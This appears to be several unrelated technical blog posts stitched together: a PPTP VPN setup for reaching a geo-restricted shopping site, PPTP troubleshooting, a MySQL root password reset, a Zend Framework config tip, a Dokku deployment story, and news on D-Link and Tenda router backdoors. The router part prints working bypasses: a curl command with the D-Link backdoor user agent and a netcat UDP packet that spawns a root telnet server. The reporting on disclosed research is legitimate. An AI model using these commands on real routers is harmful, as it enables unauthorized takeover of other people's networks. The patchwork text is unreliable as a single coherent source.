At the moment, my designer is having trouble accessing target.com, an online shopping website, to look at some products for their design work. Target.com currently only allows connections from the USA and Canada due to a website crash issue over the last couple of weeks. Since this is quite urgent, I need to set up a VPN server that they can use as a jump point to access websites in the USA and Canada. I will use my MySQL server to serve as the VPN server as well.
In this tutorial, I will use PPTP as the protocol to connect to the VPN server with a username and password, using 128-bit MPPE encryption. The values used are shown in the steps below.
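The steps below assume the pptpd package is already installed. On a CentOS/RHEL-style server (implied by the chkconfig and service commands used later in this post), the install would look roughly like this, possibly after enabling the EPEL or Poptop repository first:
$ yum install ppp pptpd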
3. Once installed, open /etc/pptpd.conf in a text editor and add the following lines:
localip 209.85.227.26
remoteip 209.85.227.27-30
4. Open /etc/ppp/options.pptpd and add the authentication method, encryption, and DNS resolver values:
require-mschap-v2
require-mppe-128
ms-dns 8.8.8.8
5. Let's create a user to access the VPN server. Open /etc/ppp/chap-secrets and add the user as below:
vpnuser pptpd myVPN$99 *
The format is: [username] [space] [server] [space] [password] [space] [IP addresses]
6. We need to allow IP packet forwarding on this server. Open /etc/sysctl.conf in a text editor and change the line below:
net.ipv4.ip_forward = 1
7. Run the following command for the changes to take effect:
$ sysctl -p
8. Allow IP masquerading in iptables by executing the following commands:
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
$ service iptables save
$ service iptables restart
Update: Once you are done with step 8, check the rules in /etc/sysconfig/iptables. Make sure that the POSTROUTING rule is above any REJECT rules.
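For reference, a minimal sketch of what the nat section of /etc/sysconfig/iptables might look like after the save (chain policies shown, packet counters omitted; interface name as in step 8):
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT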
9. Turn on the pptpd service at startup and reboot the server:
$ chkconfig pptpd on
$ init 6
Once the server is back online after the reboot, you should now be able to access the PPTP server from a VPN client. You can monitor /var/log/messages for ppp- and pptpd-related log entries (see the one-liner below). Cheers!
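For a quick view of those entries, something like this works (the grep pattern is just an example):
$ tail -f /var/log/messages | grep -iE 'ppp|pptp'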
If you are running a PPTP VPN server (pptpd) on a Linux host and your PPTP clients cannot open any web pages, here is a checklist to debug the problem:
Is there another client connected to the PPTP VPN server? If two clients are behind the same NAT, they may not be able to connect to the same PPTP VPN server at once; this is a limitation of the PPTP implementation (its GRE tunnels are hard for NAT devices to track for more than one client).
Does the PPTP VPN server allow IP forwarding? Check the kernel configuration on the PPTP server and make sure that ip_forward is enabled by running:
# sysctl -a | grep ip_forward
If you see net.ipv4.ip_forward = 0, that means IP forwarding is not enabled and you must enable it. One way is to edit /etc/sysctl.conf and change/add the following line:
net.ipv4.ip_forward = 1
Does the PPTP VPN server firewall masquerade the network interfaces? It is essential to configure the firewall to masquerade the public Internet network interface and the ppp network interfaces. Here are the firewall rules:
iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE
iptables -A POSTROUTING -t nat -o ppp+ -j MASQUERADE
Does the PPTP VPN server have clamp-mss-to-pmtu set in iptables? If your VPN clients can visit certain websites but not others, then you are very likely encountering an MTU problem. It can be fixed easily with the following iptables rule:
iptables -A FORWARD -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu
Are the DNS server addresses set correctly in the pptpd configuration? If your VPN clients can ping IP addresses (such as Google DNS 8.8.8.8) but cannot visit any websites, then it is likely a DNS issue. You can set DNS server addresses on the VPN clients, or set them on the VPN server's options.pptpd by changing/adding the following lines:
ms-dns 8.8.8.8
ms-dns 8.8.4.4
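As a minimal sketch, the server-side checks above can be run in one pass (interface names and file paths assume the setup from the tutorial earlier in this post):
# sysctl net.ipv4.ip_forward
# iptables -t nat -L POSTROUTING -n -v
# iptables -L FORWARD -n -v | grep TCPMSS
# grep ms-dns /etc/ppp/options.pptpd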
You can recover the MySQL database server password with the following five easy steps.
Step # 1: Stop the MySQL server process.
Step # 2: Start the MySQL (mysqld) server/daemon process with the --skip-grant-tables option so that it will not prompt for a password.
Step # 3: Connect to the MySQL server as the root user.
Step # 4: Set a new MySQL root account password, i.e. reset the MySQL password.
Step # 5: Exit and restart the MySQL server.
Here are the commands you need to type for each step (log in as the root user):
Step # 1: Stop the MySQL service
# /etc/init.d/mysql stop
Output:
Stopping MySQL database server: mysqld.
Step # 2: Start the MySQL server without a password:
# mysqld_safe --skip-grant-tables &
Output:
[1] 5988
Starting mysqld daemon with databases from /var/lib/mysql
mysqld_safe[6025]: started
Step # 3: Connect to the MySQL server using the mysql client:
# mysql -u root
Output:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.1.15-Debian_1-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
Step # 4: Set the new MySQL root user password
mysql> use mysql;
mysql> update user set password=PASSWORD("NEW-ROOT-PASSWORD") where User='root';
mysql> flush privileges;
mysql> quit
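Note that the UPDATE statement above matches the older server shown in this output (4.1). On MySQL 5.7 and later (an assumption, if you are on a modern install), the password column no longer exists in mysql.user, and the reset under --skip-grant-tables would instead look roughly like:
mysql> FLUSH PRIVILEGES;
mysql> ALTER USER 'root'@'localhost' IDENTIFIED BY 'NEW-ROOT-PASSWORD';
mysql> quit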
Step # 5: Stop MySQL Server:
# /etc/init.d/mysql stop
Output:
Stopping MySQL database server: mysqld
STOPPING server from pid file /var/run/mysqld/mysqld.pid
mysqld_safe[6186]: ended
[1]+ Done mysqld_safe --skip-grant-tables
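Then start MySQL normally again so that the usual privilege checks are back in effect; with the init script used above, that is:
# /etc/init.d/mysql start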
Then add a line to the config file (application/configs/application.ini). Since the library name won't be different between stages, I've put it in the base section (production):
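Reconstructed from the two remarks below (the "amz" key name is arbitrary, as point 1 explains):
[production]
autoloadernamespaces.amz = "Amz_"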
1. I had to add something (it doesn't matter what) after autoloadernamespaces. If I had written 'autoloadernamespaces = "Amz_"', this would have yielded errors, since an array is expected. By adding the ".amz" you're making autoloadernamespaces into an array.
2. Instead of just "Amz" for my class prefix, I've added "Amz_". The reason for this is to avoid "Amz111_" also being accepted as a prefix for my classes.
You might remember that in the virtual host we set up in the previous post, we set the "APPLICATION_ENV" environment variable to development. Well, it comes into play here as well. APPLICATION_ENV decides which part of the config is loaded, so in our case it's the development part. When you later set up your production environment, you set the variable to "production" and it will automatically use your production config. This enables you to have the same code on all your environments without the hassle of copying/modifying ini files like in the old days.
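For reference, in an Apache virtual host that selection is typically made with a single directive (shown here with the development value from the previous post):
SetEnv APPLICATION_ENV development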
My last infrastructure-related post was about an experience of using AppFog and eventually switching to Nodejitsu. But that was not the end. In short: for Likeastore we needed SSL support, and it happened that SSL is only available on the Nodejitsu business plan, which costs 120 USD. That was simply too much for our small venture.
A long time ago, I realized that constraints are good. This case just proved it. Looking for alternative options gave really nice results, which could easily be re-used if you are looking for a simple deployment solution.
Heroku
Heroku is a good service. I'm afraid to be mistaken, but it was probably Heroku that popularized "git-powered" deployments, where the deployment script looks like:
> git push heroku master
The rest is all handled by the service: prepare the runtime, deploy the code, start the web application, etc. Besides that, Heroku open-sourced a lot of good stuff, including so-called buildpacks, ready-to-use scripts that are able to set up a dyno with all the runtime required to start an application there.
I never seriously used Heroku, though. What I dislike is the pricing. Also, the feedback from other people I asked about their satisfaction with Heroku was not very positive (arguably). We needed a more lightweight, easy-to-change setup.
Digital Ocean
Digital Ocean is a very fast-growing cloud-computing service. It's not a PaaS (platform as a service) like Heroku; it's rather an IaaS (infrastructure as a service). They are notable for a few major things:
Ease of use – the flow from registration to first droplet creation is smooth and clear.
Regions – machines can be fired up in both the US and the EU, which is ideal for us.
But again, Digital Ocean is nothing more than great infrastructure. Herding the server is all up to you. I personally was really afraid of the prospect of setting up nginx, configuring firewalls, load balancing, etc., and that prevented me from looking at Digital Ocean closely. Having gotten used to the deployment procedures of Nodejitsu and Heroku, it's a real pain to deploy an app by FTP again and do everything manually.
But by lucky chance I noticed the Dokku project, and that was something really great; I'll explain why later.
Dokku & Docker
So, Dokku is a simply amazing hack (or more correctly, a combination of different hacks) by Jeff Lindsay. Some initial facts:
Written in Shell script and currently nearly 100 lines of code
Based on Docker
Provides Heroku-like deployment experience
Community-driven
Dokku can be installed on an Ubuntu 13 machine and turns that machine into a Heroku-like server. I mean, you can push code there, and Dokku will fire up a new Docker container, deploy the code, start the application, configure nginx, and set up environment variables and SSL.
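As a rough sketch of what that setup looks like (the bootstrap URL, server name, and app name below are assumptions, and the exact install command has changed between Dokku versions):
> wget -qO- https://raw.github.com/progrium/dokku/master/bootstrap.sh | sudo bash
> git remote add deploy-staging dokku@your-staging-server:collector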
By the way, at the time I first looked at Dokku, it was missing exactly the support for ENV variables and SSL. It was not acceptable for me without those two features. Constraints again, but that gave me the opportunity to contribute to the project, and eventually I submitted both features.
Dokku is a very interesting project. First of all, because it is based on the trendy Docker. Docker is an alternative to virtual-machine-based deployment. Deployment on virtual boxes is the de-facto standard now, and Docker is about to change that. The guys from dotCloud open-sourced a solution that allows running isolated processes (containers), which are like lightweight virtual machines. You can deploy Docker on an Ubuntu server and then use it to host any kind of applications or databases.
Docker can turn an Ubuntu server into a PaaS, and Dokku makes a great "interface" for that.
Each piece of Dokku is very interesting indeed, and I hope to blog more about it. Dokku also uses Heroku buildpacks, which makes you feel like you are dealing with Heroku, not with your own setup.
Putting Things Together
Digital Ocean and Dokku make a perfect match. As I said above, Digital Ocean is something you can really start quickly with. So, what we did was just spin up a $10 Ubuntu 13 server and install Dokku there. In total it took 7 minutes or so. I won't bother you with instructions, since you can find plenty on the internet; besides, DO + Dokku is a kind of Apple product that does not require instructions.
The first impression was simply amazing. You have everything under control and feel great with "git-powered" deployments. So, after a successful try, that machine became our staging server, and I also fired up another one for production.
Now, when we develop features and want to show them to each other or test them, you just need to do the following:
> git push deploy-staging feature:master
Counting objects: 7, done.
Delta compression using up to 8 threads.
Compressing objects: 100% (4/4), done.
Writing objects: 100% (4/4), 445 bytes | 0 bytes/s, done.
Total 4 (delta 2), reused 0 (delta 0)
remote: -----> Building collector ...
remote: Node.js app detected
remote: -----> Resolving engine versions
remote: Using Node.js version: 0.10.15
remote: Using npm version: 1.2.30
remote: -----> Fetching Node.js binaries
remote: -----> Vendoring node into slug
remote: -----> Installing dependencies with npm
remote: npm WARN package.json likeastore-collector@0.0.2-21 No repository field.
remote: npm http GET https://registry.npmjs.org/mongojs
remote: npm http GET https://registry.npmjs.org/underscore
...
remote: =====> Application deployed:
remote: http://stage-collector.likeastore.com
When we are ready to release:
> git push deploy-production master
Counting objects: 7, done.
Delta compression using up to 8 threads.
...
remote: =====> Application deployed:
remote: http://collector.likeastore.com
It’s fast and it’s pretty reliable.
In conclusion, I would say that using both Digital Ocean and Dokku was a clear win for getting Likeastore released.
A number of D-Link routers reportedly have an issue that makes them susceptible to unauthorized backdoor access.
The researcher Craig Heffner, who specializes in embedded device hacking, demonstrated the presence of a backdoor in some D-Link routers that allows an attacker to access the administration web interface of the devices without any authentication and to view or change their settings.
He found the backdoor inside firmware v1.13 for the DIR-100 revA. Craig found and extracted the SquashFS file system, then loaded the firmware's web server binary (/bin/webs) into IDA.
Looking at the string listing, Craig's attention was captured by a modified version of thttpd, thttpd-alphanetworks/2.23, implemented to provide access rights to the router's administrative interface.
The server is written by Alphanetworks, a spin-off company of D-Link. Analyzing it, Craig found many custom functions characterized by names starting with the prefix "alpha", including alpha_auth_check.
The function is invoked to parse the HTTP request during the authentication phase.
"We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request."
Analyzing the parameters passed to the function, the researcher was able to reconstruct the authentication flow: the function parses the requested URL and checks whether it contains the string "graphic/" or "public/". These are sub-directories under the device's web directory, and if the requested URL contains one of them, the request is passed without authentication.
Another intriguing detail found by Craig is that by changing the user agent in a web browser to "xmlset_roodkcableoj28840ybtide", a user could bypass the security on the device and view or control the higher functions of the router.
Craig decided to search for the string "xmlset_roodkcableoj28840ybtide" on Google and discovered traces of it only in one Russian forum post from a few years ago. Going deeper in his analysis, Craig was able to piece together the body of alpha_auth_check:
int alpha_auth_check(struct http_request_t *request)
{
    // Unauthenticated when the URL contains "graphic/" or "public/", or the backdoor User-Agent is set
    if(strstr(request->url, "graphic/") || strstr(request->url, "public/") ||
       strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
    {
        return AUTH_OK;
    }
    else
    {
        // These arguments are probably user/pass or session info
        if(check_login(request->0xC, request->0xE0) != 0)
        {
            return AUTH_OK;
        }
    }
    return AUTH_FAIL;
}
Try reading the string xmlset_roodkcableoj28840ybtide backwards: it appears as "Edit by 04882 Joel backdoor". Very cool.
The worrying part about this vulnerability is how it can be exploited. Anyone connected to the router, whether it's through Ethernet or Wi-Fi, can simply set their browser's user agent string to a specific codeword and then attempt to access the web configuration panel.
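As an illustration of how trivial the bypass is, a request like the following (the router address is a placeholder) reaches the admin interface with the backdoor user agent set:
$ curl -A "xmlset_roodkcableoj28840ybtide" http://192.168.0.1/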
Craig extended the results of his discovery to many other D-Link devices affected by the same backdoor: he searched the entire Internet for the code present in devices' HTML pages using Shodan, querying for the string "thttpd-alphanetworks/2.23", the modified version of thttpd.
After a series of tests, Craig concluded that the following D-Link devices are likely affected:
• DIR-100
• DI-524
• DI-524UP
• DI-604S
• DI-604UP
• DI-604+
• TM-G5240
The researcher also discovered that Planex routers based on the same firmware are affected by the flaw:
• BRL-04UR
• BRL-04CW
D-Link has confirmed that the flaw exists but has declined to comment on how it was introduced into its products. 'D-Link will be releasing firmware updates to address the security vulnerabilities in affected D-Link routers by the end of October,' a company spokesperson explained.
Very intriguing... What do you think about it?
Update (1:43 PM Wednesday, October 16, 2013 GMT): Nmap script is now available for automated scan and identifying the vulnerable D-Link routers, models including - DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240.
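Assuming the script ships under Nmap's usual naming scheme for this issue (the exact script name below is an assumption), a scan would look roughly like:
nmap -p 80 --script http-dlink-backdoor 192.168.0.1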
Last week Craig Heffner, who specializes in embedded device hacking, exposed a serious backdoor in a number of D-Link routers that allows unauthorized backdoor access.
Recently he published another piece of research, titled 'From China, With Love', which exposed that D-Link is not the only vendor that puts backdoors in its products. According to him, the China-based networking device and equipment manufacturer Tenda Technology (www.tenda.cn) has also added potential backdoors to its wireless routers.
He unpacked the firmware update, located the httpd binary, and found that the manufacturer is using a GoAhead web server which has been substantially modified.
These routers are protected with standard Wi-Fi Protected Setup (WPS) and a WPA encryption key, but by sending a UDP packet with a special string, an attacker could still take over the router.
The routers contain a flaw in the httpd component: the MfgThread() function spawns a backdoor service that listens for incoming messages containing commands to execute. A remote attacker with access to the local network can execute arbitrary commands with root privileges.
He observed that an attacker just needs to send the following command over UDP port 7329 to spawn a telnet server and gain root access:
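A rough, hypothetical sketch of such a probe follows; only the magic string and the UDP port come from the research, while the rest of the payload and the router address are assumptions (the -q flag assumes a GNU/traditional netcat):
echo -ne "w302r_mfg\x00x/bin/busybox telnetd" | nc -q 5 -u 192.168.0.1 7329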
Where, "w302r_mfg" is the magic string to get access via backdoor.
Some of the vulnerable routers are the W302R and W330R, as well as re-branded models such as the Medialink MWN-WAPR150N. Other Tenda routers are possibly affected as well; they all use the same "w302r_mfg" magic packet string.
An Nmap NSE script to test for the backdoored routers – tenda-backdoor.nse – is also available for penetration testing.
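Assuming the script file has been downloaded locally, a test run might look roughly like this (the UDP port matches the backdoor service described above; the router address is a placeholder):
nmap -sU -p 7329 --script ./tenda-backdoor.nse 192.168.0.1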